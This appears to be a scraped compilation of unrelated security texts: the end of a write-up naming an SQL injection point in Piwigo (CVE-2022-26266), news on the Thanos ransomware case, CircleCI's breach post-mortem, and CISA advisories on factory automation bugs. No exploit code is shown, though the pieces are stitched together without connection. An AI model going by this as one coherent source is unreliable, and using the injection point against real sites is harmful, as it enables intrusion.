By analyzing the PHP files imported from ws.php and the parameters in the packet, you can trace it back to **pwg.users.php** ![image.png](https://camo.githubusercontent.com/fa054eb335941bd782574514bcc5eed7c794de3d0bd358d101b5f25708e0f3cb/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639363535343933322d37663061633531642d343566622d346664622d386237652d3563323162666563383762352e706e6723636c69656e7449643d7534343134613162342d633463662d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3834372669643d753734383239356138266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d383437266f726967696e57696474683d31383335266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d313734383130267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7535653630373765632d616235352d346234302d393230372d6236393165623966643365267469746c653d2677696474683d31383335)

pwg.users.php is located in **\\include\\ws\_functions\\pwg.users.php**, and the order parameter is inserted into the SQL statement to join the query. And the SQL statement does not verify the validity of the passed parameters, resulting in SQL injection. ![image.png](https://camo.githubusercontent.com/ab6b7f5b2aab076bdd8abf0d0985d99401179e300256dde2f295ad0cdad12754/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639363637393139342d61326163353739302d666165662d343236302d613837612d6363376639643738343064392e706e6723636c69656e7449643d7534343134613162342d633463662d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3532352669643d753765393164383435266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d353235266f726967696e57696474683d31373437266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d313031393233267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7561363535303330372d636335662d346666622d393531322d3039323235363530356333267469746c653d2677696474683d31373437)

**Vulnerability Fix**

​

1.  Precompile SQL statements in query parameters and filter special characters such as single and double quotation marks.
2.  Perform a global check on SQL injection to prevent SQL injection. ​

CVE-2022-26266: Vul/Piwigo_12.2.0_SQLinject.md at main · JCCD/Vul

Venezuelan cardiologist allegedly tied to cybercrime scams through multiple OpSec mistakes

John Leyden 17 May 2022 at 14:12 UTC

Venezuelan cardiologist allegedly tied to cybercrime scams through multiple OpSec mistakes

A cardiologist turned alleged malware developer has been charged with creating the Thanos ransomware builder.

Moises Luis Zagala Gonzalez, 55, a citizen of France and Venezuela who resides in Ciudad Bolivar, Venezuela, engaged in attempted computer intrusions and conspiracy to commit computer intrusions, according to a US criminal complaint that was unsealed on Monday (May 16).

Zagala is alleged to have both sold and leased ransomware packages he developed to cybercriminals.

He is also accused of training would-be attackers on how to use his wares to extort victims, and subsequentially boasted about successful attacks, according to US prosecutors.

**RaaS platform**

The self-taught part-time programmer allegedly designed several ransomware tools, malicious packages designed to encrypt files on a compromised systems before demanding extortionate payments in exchange for a decryption key.

Zagala developed a ransomware tool called ‘Jigsaw v.2’ before designing a more sophisticated private ransomware builder called Thanos, a reference to either the Marvel supervillain or the figure ‘Thanatos’ from Greek mythology, according to the DoJ.

RECOMMENDED Ukrainian hacker jailed for selling account credentials on the dark web

The Thanos platform could be used to develop ransomware campaigns with custom ransom notes, features designed to frustrate security researchers and a “data stealer” facility that could be used to extract files from compromised systems.

Zagala allegedly profited from the ransomware-as-a-service (Raas) operation by licensing his software to other cybercriminals, obtaining payments in either cryptocurrency or fiat currencies.

The ransomware products and services allegedly offered by Zagala were advertised and marketed through online forums frequented by cybercriminals.

**OpSec mistakes**

A number of OpSec mistakes allowed investigators to identify Zagala as a suspect, the DoJ said.

In September 2020, an undercover FBI agent allegedly purchased a license for Thanos from Zagala and downloaded the software. In addition, an FBI informant spoke with Zagala about the possibility of establishing an affiliate program using Thanos, according to the DoJ filing.

In addition, Zagala is said to have publicly boasted about how an Iranian state-sponsored hacking group’s use of Thanos to attack Israeli companies.

Catch up with the latest cybercrime news and analysis

The Thanos software was designed to make periodic contact with a server in Charlotte, North Carolina, to check on licences. This system was apparently linked back to Zagala.

Moreover, a Florida-based relative of Zagala was interviewed by law enforcement on May 3, 2022, and admitted that their PayPal account was used by Zagala to receive illicit funds.

According to the DoJ, the relative used an email address to contact Zagala that matched the registered email for malicious infrastructure associated with the Thanos malware.

Prosecutors do not state how much Zagala made from his alleged malfeasance, but if convicted the suspect faces up to five years’ imprisonment for attempted computer intrusion, and five years’ imprisonment for conspiracy to commit computer intrusions.

YOU MAY ALSO LIKE Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

Medical doctor charged with creating the Thanos ransomware builder

John Leyden 16 January 2023 at 16:07 UTC

How the build pipeline was compromised

Popular DevOps platform CircleCI has blamed an attack that successfully planted malware on an internal engineer’s laptop for a recent security breach.

The attack, acknowledged on January 4, prompted CircleCI to advise software developers that relied on its platform to rotate secrets and API tokens.

In a post-mortem on the breach, published on Friday (January 13), the San Francisco-based company offered a detailed description of what went wrong.

BACKGROUND Devs urged to rotate secrets after CircleCI suffers security breach

CircleCI said it first got wind that something was wrong on December 29 when one of its customers reported “suspicious GitHub OAuth activity”, prompting an investigation involving CircleCI’s security team and GitHub.

The security team at the continuous integration and continuous delivery (CI/CD) vendor then discovered that an “unauthorized third party leveraged malware deployed to a CircleCI engineer’s laptop in order to steal a valid, 2FA-backed SSO \[single sign-on\] session” on or around December 16.

The malware enabled unnamed attackers to steal session cookie data before impersonating the targeted employee in order to access a “subset of CircleCI’s production systems” using forged access tokens.

“Because the targeted employee had privileges to generate production access tokens as part of the employee’s regular duties, the unauthorized third party was able to access and exfiltrate data from a subset of databases and stores, including customer environment variables, tokens, and keys,” CircleCI’s write-up of its post-mortem explains.

Miscreants were subsequentially able to extract “encryption keys from a running process, enabling them to potentially access the encrypted data” on or around December 22.

**Incident response**

In response to the attack, CircleCI restricted employee access to its production systems as a temporary measure before rebuilding its production environment with clean hosts and revoking project API tokens.

Bitbucket and GitHub OAuth tokens were rotated in the days after the attack as customers were urged to refresh and change their secrets and API tokens. In addition, CircleCI worked with AWS to notify customers of potentially affected AWS tokens.

CHECK IT OUT Potentially win swag by telling us how to improve The Daily Swig

In the wake of the attack, CircleCI has worked with external incident response experts alongside rolling out a suite of measures designed to harden the security of its platform and help its customers to better secure any secrets.

CircleCI’s writeup goes on to sketch out the tactics and techniques of its attackers alongside the publication of indications of compromise (IOCs), data that will help security defenders at other companies in both identifying and blocking similar attacks.

Although some in the security community faulted CircleCI for failing to follow best practice, particular in a failure to apply adequate access controls to production systems, others praised its “transparent and detailed incident disclosure” and the overall response to the post-mortem from infosec Twitter was positive.

DON’T MISS Deserialized web security roundup – Slack, Okta breaches; lax US gov passwords report; and more

Squaring the CircleCI: DevOps platform publishes post-mortem on recent breach

Factory automation software from Mitsubishi Electric and Rockwell Automation could be subject to remote code execution (RCE), denial-of-service (DoS), and more.

Source: frans lemmens via Alamy Stock Photo

Critical security vulnerabilities affecting factory automation software from Mitsubishi Electric and Rockwell Automation could variously allow remote code execution (RCE), authentication bypass, product tampering, or denial-of-service (DoS).

That's according to the US Cybersecurity and Infrastructure Security Agency (CISA), which warned yesterday that an attacker could exploit the Mitsubishi Electric bug (CVE-2023-6943, CVSS score of 9.8) by calling a function with a path to a malicious library while connected to the device — resulting in authentication bypass, RCE, DoS, or data manipulation.

The Rockwell Automation bug (CVE-2024-10386, CVSS 9.8), meanwhile, stems from a missing authentication check; a cyberattacker with network access could exploit it by sending crafted messages to a device, potentially resulting in database manipulation.

The critical vulnerabilities are two out of several issues affecting Mitsubishi's and Rockwell Automation's smart-factory portfolios, all listed in CISA's Halloween disclosure. Both industrial control systems (ICS) suppliers have issued mitigations for manufacturers to follow in order to avoid future compromise.

The noncritical bugs include:

*   An out-of-bounds read that could result in DoS (CVE-2024-10387, CVSS 7.5) also affects the Rockwell Automation FactoryTalk ThinManager.
    
*   A remote unauthenticated attacker may be able to bypass authentication in Mitsubishi Electric FA Engineering Software Products by sending specially crafted packets (CVE-2023-6942, CVSS 7.5). And the Mitsubishi Electric portfolio is also vulnerable to several lower-severity bugs, CISA noted.
    
*   An authentication bypass vulnerability in the Mitsubishi Electric MELSEC iQ-R Series/iQ-F Series (CVE-2023-2060, CVSS 8.7) exists in its FTP function on EtherNet/IP modules. Weak password requirements could allow a remote, unauthenticated attacker to access the module via FTP by dictionary attack or password sniffing. Meanwhile, several other lower-severity issues also affect the platform, CISA noted.
    

Related:Dark Reading Confidential: Pen-Test Arrests, 5 Years Later

Manufacturers should apply patches and mitigations as soon as possible, given that smart factories are among the most-targeted ICS sectors. The news also comes as nation-state attacks on US critical infrastructure have ramped up, with CISA warning that both Russian and Chinese advanced persistent threats (APTs) show no signs of letting up their assaults on utilities, telecoms, and other high-value targets. Canada as well recently warned of sustained cyber assaults from China on its critical infrastructure footprint.

Related:IT Security Centralization Makes the Use of Industrial Spies More Profitable

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us